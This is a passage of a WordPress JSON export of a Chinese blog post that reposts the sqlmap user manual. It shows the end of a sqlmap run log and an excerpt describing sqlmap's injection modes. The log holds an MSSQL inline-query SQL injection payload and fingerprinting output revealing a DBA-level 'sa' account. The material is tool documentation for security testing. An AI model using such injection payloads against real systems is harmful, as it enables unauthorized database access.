New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;inline&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=(SELECT&nbsp;CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;(SELECT&nbsp;(CASE&nbsp;WHEN&nbsp;(6382=6382)&nbsp;THEN&nbsp;CHAR(49)&nbsp;ELSE&nbsp;CHAR(48)&nbsp;END))&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;XP<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP,&nbsp;Microsoft&nbsp;IIS&nbsp;5.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;XP&nbsp;Service&nbsp;Pack&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005&nbsp;&#8211;&nbsp;9.00.1399.06&nbsp;(Intel&nbsp;X86)&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Oct&nbsp;14&nbsp;2005&nbsp;00:33:37&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Copyright&nbsp;(c)&nbsp;1988-2005&nbsp;Microsoft&nbsp;Corporation<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Express&nbsp;Edition&nbsp;on&nbsp;Windows&nbsp;NT&nbsp;5.1&nbsp;(Build&nbsp;2600:&nbsp;Service&nbsp;Pack&nbsp;2)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">current&nbsp;user:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;sa&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">current&nbsp;database:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;testdb&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">current&nbsp;user&nbsp;is&nbsp;DBA:&nbsp;&nbsp;&nbsp;&nbsp;True<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;shutting&nbsp;down&nbsp;at&nbsp;11:25:52<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\n\t\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a\n<\/p>\n<pre class=\"prettyprint\"><span class=\"lit\">1<\/span><span class=\"pun\">\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u6570<\/span><span class=\"lit\">2<\/span><span class=\"pun\">\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cd<\/span><span class=\"pln\">SQL<\/span><span class=\"pun\">\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u5165<\/span><span class=\"lit\">3<\/span><span class=\"pun\">\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e93<\/span><span class=\"lit\">4<\/span><span class=\"pun\">\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e<\/span><\/pre>\n<p>\n\tsqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a\n<\/p>\n<pre class=\"prettyprint\"><span class=\"lit\">1<\/span><span class=\"pun\">\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u3002<\/span><span class=\"lit\">2<\/span><span 
class=\"pun\">\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u3002<\/span><span class=\"lit\">3<\/span><span class=\"pun\">\u3001\u57fa\u4e8e\u62a5...<\/span><\/pre>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[],"class_list":["post-108","post","type-post","status-publish","format-standard","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=108\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a  1\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u65702\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cdSQL\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u51653\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e934\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e   sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a  
1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u30022\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u30023\u3001\u57fa\u4e8e\u62a5...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=108\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2014-10-19T13:50:20+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"42 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\",\"url\":\"http:\/\/weizn.net\/?p=108\",\"name\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c - Wayne&#039;s 
Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"datePublished\":\"2014-10-19T13:50:20+00:00\",\"dateModified\":\"2014-10-19T13:50:20+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=108#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=108\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=108#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=108#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"[\\u8f6c]Sqlmap\\u7528\\u6237\\u624b\\u518c\",\"datePublished\":\"2014-10-19T13:50:20+00:00\",\"dateModified\":\"2014-10-19T13:50:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=108#webpage\"},\"wordCount\":8337,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=108#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=108","og_locale":"zh_CN","og_type":"article","og_title":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","og_description":"\u5f53\u7ed9sqlmap\u8fd9\u4e48\u4e00\u4e2aurl\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a  1\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u65702\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cdSQL\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u51653\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e934\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e   sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a  1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u30022\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u30023\u3001\u57fa\u4e8e\u62a5...","og_url":"http:\/\/weizn.net\/?p=108","og_site_name":"Wayne&#039;s Blog","article_published_time":"2014-10-19T13:50:20+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"42 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s 
Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=108#webpage","url":"http:\/\/weizn.net\/?p=108","name":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"datePublished":"2014-10-19T13:50:20+00:00","dateModified":"2014-10-19T13:50:20+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=108#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=108"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=108#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=108#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=108#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c","datePublished":"2014-10-19T13:50:20+00:00","dateModified":"2014-10-19T13:50:20+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=108#webpage"},"wordCount":8337,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=108#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/we
izn.net\/index.php?rest_route=\/wp\/v2\/posts\/108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=108"}],"version-history":[{"count":0,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/108\/revisions"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=108"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}